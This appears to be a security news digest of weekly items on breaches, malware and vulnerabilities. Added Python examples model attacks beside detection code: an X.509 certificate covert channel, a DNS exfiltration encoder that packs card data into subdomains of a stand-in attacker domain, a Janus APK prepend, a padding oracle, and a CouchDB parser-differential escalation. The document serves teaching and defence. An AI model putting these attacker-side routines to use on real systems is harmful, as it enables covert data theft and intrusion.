Tag Facebook

InfoSec Week 7, 2018

Fidelis Cybersecurity researcher Jason Reaves demonstrated how to covertly exchange data using X.509 digital certificates. The proof-of-concept code carries the payload in the SubjectKeyIdentifier extension and generates certificates on the fly, so the traffic looks like ordinary certificate exchange.
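
How such a channel is built, and what a defender can check, as an added example (this is not Jason Reaves's proof-of-concept code): a hand-rolled DER encoder/decoder for the Extension structure, a sender that spreads a message over several 20-byte SubjectKeyIdentifier values, and a receiver that reassembles them. The framing (1-byte sequence number, 1-byte length, 18 data bytes per SKI) and the sample public-key bits are this example's own assumptions, not details from the Fidelis research. The last function is the check a defender can run: a benign SKI is normally one of the two RFC 5280 derivations of the certificate's own public key.

```python
"""Covert channel in the X.509 SubjectKeyIdentifier (SKI) extension, plus a detection check."""
import hashlib

OID_SKI = bytes.fromhex("551d0e")  # DER value of OID 2.5.29.14 (id-ce-subjectKeyIdentifier)
CHUNK = 18                         # 2 header bytes + 18 data bytes = 20, the size of a SHA-1 SKI


def der_length(n: int) -> bytes:
    """DER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + der_length(len(body)) + body


def parse_tlv(buf: bytes, pos: int = 0):
    """Return (tag, value, position after this TLV) for the element at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def ski_extension(key_id: bytes) -> bytes:
    """Extension ::= SEQUENCE { extnID OID, extnValue OCTET STRING };
    for SKI the extnValue wraps KeyIdentifier ::= OCTET STRING."""
    return der(0x30, der(0x06, OID_SKI) + der(0x04, der(0x04, key_id)))


def ski_key_id(extension: bytes) -> bytes:
    """Inverse of ski_extension: pull the KeyIdentifier bytes out of an Extension."""
    tag, seq, _ = parse_tlv(extension)
    if tag != 0x30:
        raise ValueError("Extension must be a SEQUENCE")
    tag, oid, pos = parse_tlv(seq)
    if tag != 0x06 or oid != OID_SKI:
        raise ValueError("not a subjectKeyIdentifier extension")
    tag, value, pos = parse_tlv(seq, pos)
    if tag == 0x01:  # optional 'critical' BOOLEAN, skip it
        tag, value, pos = parse_tlv(seq, pos)
    if tag != 0x04:
        raise ValueError("extnValue must be an OCTET STRING")
    tag, key_id, _ = parse_tlv(value)
    if tag != 0x04:
        raise ValueError("KeyIdentifier must be an OCTET STRING")
    return key_id


def encode_message(message: bytes) -> list:
    """Sender: one SKI extension per 18-byte fragment, each key id exactly 20 bytes long
    (assumed framing: sequence number, length, data, zero padding)."""
    chunks = [message[i:i + CHUNK] for i in range(0, len(message), CHUNK)]
    if len(chunks) > 256:
        raise ValueError("message too long for a 1-byte sequence number")
    return [ski_extension(bytes([seq, len(c)]) + c.ljust(CHUNK, b"\0"))
            for seq, c in enumerate(chunks)]


def decode_message(extensions) -> bytes:
    """Receiver: reassemble fragments by sequence number; certificates may arrive in any order."""
    frags = {}
    for ext in extensions:
        key_id = ski_key_id(ext)
        seq, n = key_id[0], key_id[1]
        frags[seq] = key_id[2:2 + n]
    return b"".join(frags[seq] for seq in sorted(frags))


def benign_ski(public_key_bits: bytes) -> bytes:
    """RFC 5280 4.2.1.2 method (1): SHA-1 of the subjectPublicKey BIT STRING contents."""
    return hashlib.sha1(public_key_bits).digest()


def ski_matches_key(key_id: bytes, public_key_bits: bytes) -> bool:
    """Defender's check: does the SKI equal either RFC 5280 derivation of the key?
    Method (2) is the 4-bit value 0100 followed by the low 60 bits of the SHA-1 hash.
    CAs may use other derivations, so a mismatch is a lead, not proof of a covert channel."""
    digest = benign_ski(public_key_bits)
    method2 = bytes([0x40 | (digest[-8] & 0x0F)]) + digest[-7:]
    return key_id in (digest, method2)


# Constructed stand-in for a certificate's subjectPublicKey bits (not a real key).
SAMPLE_PUBKEY_BITS = bytes(range(64))
```

Because each fragment is padded to 20 bytes, the field length gives nothing away; the mismatch between the SKI and the certificate's own public key is what remains visible, which is why the check above compares against both RFC 5280 derivations before raising a flag.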

The "UDPoS" Point of Sale malware uses DNS traffic to exfiltrate stolen credit card data.
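
The technique and the matching detection, as an added example that is not UDPoS code: encode_exfil() models how card data can be carried out in base32 subdomain labels of an attacker-controlled domain, and suspicious_queries() is detection logic a defender can run over resolver query logs, flagging long high-entropy labels and, more precisely, labels that decode to a Luhn-valid card number. The log format, the domain name and the test PAN are all constructed for the example.

```python
"""DNS exfiltration of card data: attacker-side encoding and a log-based detector."""
import base64
import math
import re
from collections import Counter

EXFIL_DOMAIN = "cdn-update.example"      # hypothetical attacker-controlled domain
CARD_TRACK = b"4111111111111111=2512"     # constructed test PAN (Luhn-valid) plus expiry


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: the cheapest way to tell a real PAN from a random digit run."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def encode_exfil(payload: bytes, domain: str = EXFIL_DOMAIN, chunk: int = 30) -> list:
    """Attacker: 30 payload bytes become 48 base32 chars, under the 63-byte label limit."""
    names = []
    for i in range(0, len(payload), chunk):
        label = base64.b32encode(payload[i:i + chunk]).decode().rstrip("=").lower()
        names.append(f"{label}.{domain}")
    return names


def decode_label(label: str):
    """Try to read a label as unpadded base32; None if it is not."""
    s = label.upper()
    try:
        return base64.b32decode(s + "=" * (-len(s) % 8))
    except Exception:
        return None


PAN_RE = re.compile(rb"\d{13,19}")


def find_pans(data: bytes) -> list:
    return [m.group().decode() for m in PAN_RE.finditer(data) if luhn_ok(m.group().decode())]


def suspicious_queries(log_lines) -> list:
    """Detector: flag queries whose first label is long and high-entropy, or decodes
    to data containing a Luhn-valid PAN. Returns [(qname, [reasons])]."""
    findings = []
    for line in log_lines:
        qname = line.split()[-1].rstrip(".")
        first = qname.split(".")[0]
        reasons = []
        if len(first) >= 20 and entropy(first) > 3.5:
            reasons.append("long high-entropy label")
        for pan in find_pans(decode_label(first) or b""):
            reasons.append(f"label decodes to Luhn-valid PAN {pan}")
        if reasons:
            findings.append((qname, reasons))
    return findings


# Constructed resolver log: "<time> <client> <qtype> <qname>"
SAMPLE_LOG = [
    "2018-02-10T12:00:01Z 10.0.0.5 A www.example.com",
    "2018-02-10T12:00:02Z 10.0.0.5 A mail.example.com",
    "2018-02-10T12:00:03Z 10.0.0.5 A api.updates.example.net",
] + [f"2018-02-10T12:00:04Z 10.0.0.9 A {name}" for name in encode_exfil(CARD_TRACK)]
```

The Luhn check is what keeps this usable in production: plenty of legitimate CDN and telemetry hostnames carry long encoded labels, but very few decode to a checksum-valid 13-19 digit number. A real deployment would also rate queries per domain, since an exfiltration run produces many unique subdomains under one parent.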

Talos analyzed the malware that targeted Olympic computer systems during the opening ceremony. Its purpose was information gathering and the destruction of the infected systems.

A zero-day vulnerability in the Bitmessage messaging client was exploited to steal Electrum cryptocurrency wallet keys.

Trustwave analyzed a multi-stage Microsoft Word attack that does not use macros. A really creative technique.

Microsoft can't fix the Skype privilege escalation bug without a massive code rewrite, so they have postponed the fix for a while.

Facebook is advertising their Onavo VPN application, but there are a few reasons why it is really not a good idea to use it.

Facebook is sending spam SMS to phone numbers that users registered for two-factor authentication (2FA), and then posts their replies to the users' walls.

(Not only) performance analysis of the Retpoline mitigation for the Spectre vulnerability.

A guide on how to brute-force Linux Full Disk Encryption (LUKS) volumes using Hashcat.

Proof of concept for a LibreOffice remote arbitrary file disclosure vulnerability: a malicious document can silently send any file from the victim's machine. All operating systems are affected in versions before 5.4.5/6.0.1.

InfoSec Week 49, 2017

The "Janus" Android vulnerability (CVE-2017-13156) allows attackers to modify the code of applications without affecting their signatures. The root of the problem is that a single file can be a valid APK file and a valid DEX file at the same time: the zip-based signature verifier and installer locate the APK content from the end of the file, while the runtime decides how to load the file from the header at its start, so a DEX file prepended to a signed APK gets executed instead of the signed code. The vulnerability allows attackers to inject malware into a legitimate application while avoiding detection. Only apps that rely solely on the v1 (JAR) signature scheme are affected; APK signature scheme v2 signs the whole file and catches the modification.
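
Janus in miniature, as an added example that is not GuardSquare's code: a zip with a stub DEX header in front is still read correctly by zip tooling (Python's zipfile, like Android's v1 verifier, finds the central directory from the end of the file), a model of the per-entry v1 digest stays unchanged, and yet the file now starts with the DEX magic that the runtime looks at. FAKE_DEX is only the magic plus padding, the zip entries are constructed stand-ins for an APK, and v1_manifest_digest() is a simplified model of what the JAR signature covers.

```python
"""Janus (CVE-2017-13156): one file that is both a zip/APK and a DEX, and a check for it."""
import hashlib
import io
import zipfile

DEX_MAGIC = b"dex\n035\0"
FAKE_DEX = DEX_MAGIC + b"\0" * 24   # constructed stub; a real attack prepends a complete DEX


def build_apk_like_zip(entries: dict) -> bytes:
    """Constructed stand-in for an APK: a plain zip with the given entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def janus_prepend(dex_bytes: bytes, apk_bytes: bytes) -> bytes:
    """The whole trick: DEX in front, untouched (still signed) APK behind."""
    return dex_bytes + apk_bytes


def read_zip_entries(blob: bytes) -> dict:
    """What zip-based tooling and the v1 verifier see: the central directory is
    located from the end of the file, so leading bytes are silently skipped."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def v1_manifest_digest(blob: bytes) -> str:
    """Model of the v1 scheme: digests over entry names and contents only."""
    h = hashlib.sha256()
    for name, data in sorted(read_zip_entries(blob).items()):
        h.update(name.encode() + b"\0" + hashlib.sha256(data).digest())
    return h.hexdigest()


def starts_like_dex(blob: bytes) -> bool:
    """What the runtime checks at offset 0 before loading code."""
    return blob.startswith(DEX_MAGIC)


def is_janus_candidate(blob: bytes) -> bool:
    """Defensive check a scanner can run: a genuine APK begins with a zip local file
    header (PK\\x03\\x04); anything else in front of a readable zip is suspect."""
    return not blob.startswith(b"PK\x03\x04") or starts_like_dex(blob)


def demo() -> dict:
    apk = build_apk_like_zip({"AndroidManifest.xml": b"<manifest/>",
                              "classes.dex": b"original app code"})
    evil = janus_prepend(FAKE_DEX, apk)
    return {
        "same_entries": read_zip_entries(evil) == read_zip_entries(apk),
        "same_v1_digest": v1_manifest_digest(evil) == v1_manifest_digest(apk),
        "loads_as_dex": starts_like_dex(evil),
        "flagged": is_janus_candidate(evil) and not is_janus_candidate(apk),
    }
```

The v2 scheme closes the gap by signing the file bytes themselves (everything except the signing block), so the prepended DEX would invalidate the signature; is_janus_candidate() is the cheap check for environments that still accept v1-only apps.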

According to research by Hanno Böck, Juraj Somorovsky and Craig Young (the "ROBOT" attack), Bleichenbacher's 1998 padding oracle attack on RSA PKCS#1 v1.5 encryption still works against almost 3% of the Alexa top million most visited websites: the affected servers respond in a distinguishable way when the decrypted RSA block has invalid padding. The researchers were even able to sign a message using Facebook's private TLS key. Products from Citrix, F5, Cisco and several TLS implementations are affected.
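
Why the oracle is enough, and what the countermeasure looks like, as an added example that is not the ROBOT code: oracle_decrypt() fails visibly on bad PKCS#1 v1.5 padding, which is the oracle; blind_ciphertext() uses RSA's malleability to turn the victim's ciphertext into one that decrypts to s*m, which is the query Bleichenbacher's algorithm repeats with adaptively chosen s to narrow m down; hardened_decrypt() is the RFC 5246 7.4.7.1 behaviour of never signalling failure and substituting a random secret instead. The key is a toy built from two well-known primes and the secret length is shortened to fit it; both are this example's assumptions.

```python
"""PKCS#1 v1.5 padding oracle (Bleichenbacher/ROBOT) beside the TLS countermeasure."""
import secrets

P = (1 << 61) - 1    # Mersenne prime M61; toy modulus, real keys are >= 2048 bits
Q = (1 << 64) - 59   # largest prime below 2**64
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8   # modulus size in bytes (16)
SECRET_LEN = 5                  # TLS premaster secrets are 48 bytes; shortened for the toy key


def pkcs1_v15_pad(msg: bytes) -> bytes:
    """EM = 00 || 02 || PS (at least 8 nonzero random bytes) || 00 || M"""
    ps_len = K - 3 - len(msg)
    if ps_len < 8:
        raise ValueError("message too long for the modulus")
    ps = bytes(secrets.randbelow(255) + 1 for _ in range(ps_len))
    return b"\x00\x02" + ps + b"\x00" + msg


def rsa_encrypt(msg: bytes) -> int:
    return pow(int.from_bytes(pkcs1_v15_pad(msg), "big"), E, N)


def rsa_decrypt_raw(c: int) -> bytes:
    return pow(c, D, N).to_bytes(K, "big")


class PaddingError(Exception):
    pass


def oracle_decrypt(c: int) -> bytes:
    """Vulnerable: a distinct failure (error message, alert or timing) for bad padding."""
    em = rsa_decrypt_raw(c)
    if em[:2] != b"\x00\x02":
        raise PaddingError("wrong block type")
    sep = em.find(b"\x00", 2)
    if sep < 10:                       # separator missing, or fewer than 8 padding bytes
        raise PaddingError("bad padding string")
    return em[sep + 1:]


def hardened_decrypt(c: int) -> bytes:
    """RFC 5246 7.4.7.1: always hand back SECRET_LEN bytes; on any padding or length
    problem use random bytes, so the handshake fails later with no distinguishable error."""
    em = rsa_decrypt_raw(c)
    fallback = secrets.token_bytes(SECRET_LEN)      # drawn unconditionally, before any check
    sep = em.find(b"\x00", 2)
    ok = em[:2] == b"\x00\x02" and sep >= 10 and K - sep - 1 == SECRET_LEN
    return em[sep + 1:] if ok else fallback


def is_conforming(c: int) -> bool:
    """The single bit an attacker extracts per query against the vulnerable server."""
    try:
        oracle_decrypt(c)
        return True
    except PaddingError:
        return False


def blind_ciphertext(c: int, s: int) -> int:
    """RSA malleability: Dec(c * s^e) = s * m mod n. The attack feeds these to is_conforming()
    for chosen s, and each answer tells it whether s*m lies in [2B, 3B)."""
    return (c * pow(s, E, N)) % N
```

Note what the hardened version does not do: it does not return early, does not raise, and draws the fallback secret whether or not it will be needed, because the attack only needs any observable difference between the conforming and non-conforming cases.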

HP had a keylogger in the Touchpad driver, which was disabled by default, but could be enabled by setting a registry value.

There is a remote root code execution flaw (CVE-2017-15944) in the Palo Alto Networks firewalls.

Researchers from Group-IB tracked the operations of the Russian-speaking MoneyTaker group, which stole as much as $10 million from US and Russian banks.

Recorded Future analyzed costs of various cybercriminal services sold on the dark market.

Internet traffic for organizations such as Google, Apple, Facebook, Microsoft and Twitch was briefly rerouted through Russia after a BGP route hijack.

Microsoft started rolling out an update for the Malware Protection Engine to fix a remotely exploitable bug discovered by the UK's National Cyber Security Centre (NCSC), part of GCHQ.

Avast open-sources RetDec machine-code decompiler for platform-independent analysis of executable files. It's based on LLVM.

Wireless network sniffer Kismet now supports the DJI DroneID UAV telemetry extensions.

Wazuh helps you gain deeper security visibility into your infrastructure by monitoring hosts at the operating system and application level.
It supports log management and analysis, integrity monitoring, anomaly detection and compliance monitoring.

Wifiphisher is a tool for automated, victim-customized phishing attacks against Wi-Fi clients.

InfoSec Week 45, 2017

Researchers exploited the antivirus quarantine mechanism to gain privileges by manipulating the restore-from-quarantine process. By abusing NTFS directory junctions, the restore path can be redirected so that previously quarantined files are written, with the AV engine's privileges, to arbitrary file system locations, such as system directories that an unprivileged user cannot otherwise write to.

WikiLeaks released the source code of leaked CIA hacking tools (Vault 8), and it indicates that the CIA used fake certificates impersonating Kaspersky Lab in the authentication of its Hive implants.

A security researcher has discovered a factory test application (EngineerMode) left on OnePlus devices. It can be used to gain root privileges, dump photos and collect Wi-Fi and GPS information.

There was a vulnerability in CouchDB caused by a discrepancy between the database's native JSON parser and the JavaScript JSON parser used during document validation: the two disagreed on which value wins when a key is repeated, so a document could pass validation with one set of roles and be stored with another (CVE-2017-12635 for the privilege escalation, CVE-2017-12636 for the code execution). Because CouchDB databases are meant to be exposed directly to the internet, this enabled privilege escalation, and ultimately remote code execution, on a large number of installations.
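
The parser differential modelled in a few lines, as an added example that is not CouchDB's code: js_style_parse() has JSON.parse semantics (last duplicate key wins), first_wins_parse() models the Erlang side where the first occurrence is the one looked up, and strict_parse() is the fix of rejecting duplicate keys outright. The validation function is a simplified model of the _users design document's check, and the document body and user context are constructed.

```python
"""Duplicate-key parser differential behind the CouchDB _users privilege escalation."""
import json

# Constructed malicious request body: 'roles' appears twice.
SAMPLE_DOC = ('{"type":"user","name":"oops","roles":["_admin"],'
              '"roles":[],"password":"hunter2"}')


def js_style_parse(text: str) -> dict:
    """JSON.parse semantics: for duplicate keys the last value wins."""
    return json.loads(text)


def first_wins_parse(text: str) -> dict:
    """Model of the storage side: the first occurrence of a key is the one looked up."""
    def keep_first(pairs):
        out = {}
        for key, value in pairs:
            out.setdefault(key, value)
        return out
    return json.loads(text, object_pairs_hook=keep_first)


def strict_parse(text: str) -> dict:
    """The fix: refuse documents in which any object (at any depth) repeats a key."""
    def no_duplicates(pairs):
        keys = [k for k, _ in pairs]
        if len(keys) != len(set(keys)):
            dups = sorted({k for k in keys if keys.count(k) > 1})
            raise ValueError(f"duplicate keys in JSON object: {dups}")
        return dict(pairs)
    return json.loads(text, object_pairs_hook=no_duplicates)


def validate_doc_update(new_doc: dict, user_ctx: dict) -> None:
    """Simplified _users validation: only an _admin may set roles."""
    if "_admin" in user_ctx.get("roles", []):
        return
    if new_doc.get("roles"):
        raise PermissionError("Only _admin may edit roles")


def vulnerable_put(body: str, user_ctx: dict) -> dict:
    """Validation sees roles == [] and passes; storage keeps roles == ['_admin']."""
    validate_doc_update(js_style_parse(body), user_ctx)
    return first_wins_parse(body)


def fixed_put(body: str, user_ctx: dict) -> dict:
    doc = strict_parse(body)          # raises on the duplicate key before any validation
    validate_doc_update(doc, user_ctx)
    return doc


def rejects(put, body: str, user_ctx: dict) -> bool:
    """True if the given PUT model refuses the request (parse error or permission error)."""
    try:
        put(body, user_ctx)
        return False
    except (ValueError, PermissionError):
        return True
```

The general lesson is that any time two parsers see the same bytes at different trust boundaries, their disagreements become the attacker's input; the robust fix is to parse once and hand the same object to both the policy check and the store, or, failing that, to reject every input on which the parsers could disagree.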

Researchers from the Princeton university have been studying third-party trackers that record sensitive personal data that users type into websites, and the results are not good.

iPhone X's Face ID facial recognition was circumvented by researchers at the Vietnamese security firm Bkav using a 3D-printed mask.

Security researchers Maxim Goryachy and Mark Ermolov of Positive Technologies report being able to execute unsigned code on the Intel Management Engine over USB, via JTAG debugging exposed through Intel's Direct Connect Interface (DCI).

Deep dive into a Facebook sextortion scheme that uses fake profiles of young girls, by the guys from Marseille.

Long read about how the security breaches by the Shadow Brokers damaged the US National Security Agency.

Analysis of a low cost Chinese GSM listening and location device hidden inside the plug of a standard USB data/charging cable.

Privacy Pass is a browser extension for Chrome and Firefox that uses privacy-preserving cryptography to let users prove to a service that they have already passed its challenge, without the service being able to recognise them. It uses blinded tokens: the client blinds a token before the server signs it and unblinds it afterwards, so a token the server later sees redeemed cannot be linked to the one it signed.
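
The blind-sign-unblind-redeem flow, as an added example that is not the Privacy Pass code: Privacy Pass itself blinds points on an elliptic curve (a verifiable oblivious PRF), while this uses Chaum's RSA blind signature to show the same three steps and the two properties that matter, that a redeemed token verifies and can be spent only once, and that the issuer's record of what it signed cannot be matched to the token later redeemed. The key is a toy built from two well-known primes and the hash-to-integer step is a simplification; both are this example's assumptions.

```python
"""Blinded token issuance and redemption with Chaum RSA blind signatures (toy key)."""
import hashlib
import math
import secrets

P = (1 << 61) - 1    # Mersenne prime M61 (toy size; real keys are far larger)
Q = (1 << 64) - 59   # largest prime below 2**64
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))


def h(token: bytes) -> int:
    """Hash-to-integer mod N (toy; real RSA blind signatures use a full-domain hash)."""
    return int.from_bytes(hashlib.sha256(token).digest(), "big") % N


def client_blind(token: bytes):
    """Client: multiply H(token) by r^e for a random invertible r; keep r secret."""
    while True:
        r = secrets.randbelow(N)
        if r > 1 and math.gcd(r, N) == 1:
            break
    return (h(token) * pow(r, E, N)) % N, r


def client_unblind(blind_sig: int, r: int) -> int:
    """Client: (H(t) r^e)^d / r = H(t)^d, a plain signature on the token."""
    return (blind_sig * pow(r, -1, N)) % N


def verify(token: bytes, sig: int) -> bool:
    return pow(sig, E, N) == h(token)


class Issuer:
    """Server side: signs blinded values, later accepts each unblinded token once."""

    def __init__(self):
        self.signed = []        # everything the issuer saw at issuance time
        self.spent = set()

    def sign(self, blinded: int) -> int:
        self.signed.append(blinded)
        return pow(blinded, D, N)

    def redeem(self, token: bytes, sig: int) -> bool:
        """Accept a valid, not-yet-spent token; the double-spend set is the only state needed."""
        if not verify(token, sig) or token in self.spent:
            return False
        self.spent.add(token)
        return True

    def can_link(self, token: bytes, sig: int) -> bool:
        """Could the issuer tie this redemption to an issuance record? Only if the
        value it signed were H(token) itself or the final signature, which it is not."""
        return h(token) in self.signed or sig in self.signed


def run_protocol(token: bytes, issuer: Issuer) -> int:
    """One full issuance: blind, have it signed, unblind."""
    blinded, r = client_blind(token)
    return client_unblind(issuer.sign(blinded), r)
```

Unlinkability rests on r being uniformly random and invertible: for every blinded value the issuer saw there is some r that maps it to any given redeemed token, so the issuer's log carries no information about which signature became which token.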

InfoSec Week 33, 2017

Danish shipping conglomerate Maersk expects to lose between $200m and $300m due to the (Not)Petya ransomware infection, according to its latest quarterly results.

A Windows Object Linking and Embedding (OLE) interface vulnerability is being exploited through Microsoft PowerPoint files in order to install malware.

Interesting blog post about exploiting Foxit Reader:
"A tale about Foxit Reader - Safe Reading mode and other vulnerabilities"

Engineer decrypts Apple's Secure Enclave Processor (SEP) firmware.

Facebook awarded $100,000 to the 2017 Internet Defense Prize winning paper "Detecting Credential Spearphishing Attacks in Enterprise Settings". Very useful research on an urgent topic.
https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/ho https://research.fb.com/facebook-awards-100000-to-2017-internet-defense-prize-winners/

Cryptographic library Libsodium has been audited by Matthew Green of Cryptography Engineering.

New research on the 768-bit discrete logarithm problem (the size of IPsec's Oakley group 1) concludes that "[building] a massive decryption tool of IPsec traffic protected by the Oakley group 1 (a 768-bit discrete logarithm problem) was feasible in a reasonable time using technologies available before the year 2000." https://eprint.iacr.org/2017/758

EggShell is an iOS and macOS post-exploitation surveillance pentest tool written in Python.

InfoSec Week 5, 2017

Egyptian human rights activists, dissidents, lawyers and journalists were targeted by a phishing campaign. Links in the emails lead to a fake login page designed to trick the targets into handing over their Dropbox credentials.

Multiple Polish banks were infected with malware served from the compromised website of the Polish financial regulator KNF.

Hackers broke into the Czech Foreign Ministry's email system. "It must have been carried out from the outside, by another country. The way it was done bears a very strong resemblance to the attacks on the US Democratic Party's internet system," said the foreign minister, citing experts.

Extensive analysis of the Locky Bart ransomware binary and its backend server. The executable is obfuscated with WPProtect code virtualization, and the server backend is written with the Yii PHP framework.

The Turla APT group is using a new JavaScript payload called KopiLuwak in its phishing attacks. The payload is dropped by a macro embedded in Office documents and uses multiple layers of JavaScript obfuscation.

APT activity attributed to Chinese actors is targeting the military and aerospace industries in Russia and Belarus. The malware uses steganography to hide its payload.

Can foreign governments launch malware attacks on Americans without consequences? There is an interesting ongoing court case, Kidane v. Ethiopia, in which Ethiopia's lawyer argued "that it should be able to do anything to Americans in America, even set off a car bomb, as long as Ethiopia didn't have a human agent in the United States. One judge asked what would happen if Ethiopia mailed a letter bomb into the United States to assassinate an opponent, or hacked an American's self-driving car, causing it to crash. Ethiopia didn't hesitate: their counsel said that they could not be sued for any of those."

A hacker who stole 900 GB of data from the mobile forensics company Cellebrite leaked some known iOS exploitation tools online and announced further releases. The released tools are publicly available frameworks; the hacker added that the BlackBerry files in his possession are not publicly available.

Facebook engineers presented at the USENIX Enigma conference a new mechanism for recovering access to lost online accounts, called Delegated Recovery. Delegated Recovery "allows an application to delegate the capability to recover an account to an account controlled by the same user or entity at a third party service provider".

Printer Exploitation Toolkit (PRET) is a new printer security testing framework.

InfoSec Week 4, 2017

LUNAR is a UNIX security auditing tool which generates a scored audit report of a Unix host's security.

Spora Ransomware has started to spread worldwide, outside Russian-speaking countries.

VirLocker ransomware is back, packing user files into executables. Every encrypted file is turned into an executable carrying the malware, so it spreads faster. Fortunately, infected users can recover their data without paying the ransom.

A malicious Microsoft Word document targeted NATO members in a campaign during the Christmas and New Year holidays.
"The purpose of the document is first to perform a reconnaissance of the victims in order to avoid communicating with sandbox systems or analyst virtual machines. Second, the Adobe Flash requests a payload and an Adobe Flash exploit which is loaded and executed on the fly. This approach is extremely clever, from the attacker point of view, the exploit is not embedded in the document making it more difficult to detect for some security devices than the standard word trojan."

Google announced the launch of a Root Certificate Authority - Google Trust Services - that will allow the company to independently handle certificates on behalf of Google and Alphabet.
https://security.googleblog.com/2017/01/the-foundation-of-more-secure-web.html https://pki.goog/

A hacker is accessing public and unsecured Apache Cassandra databases, creating an extra table with a message that the database is unprotected.

Gmail will block .js file attachments starting February 13, 2017. The users who want to send .js files after this date can use Google Drive, Google Cloud Storage, or other storage solutions.

Facebook now supports physical security keys (U2F) as a second factor for login.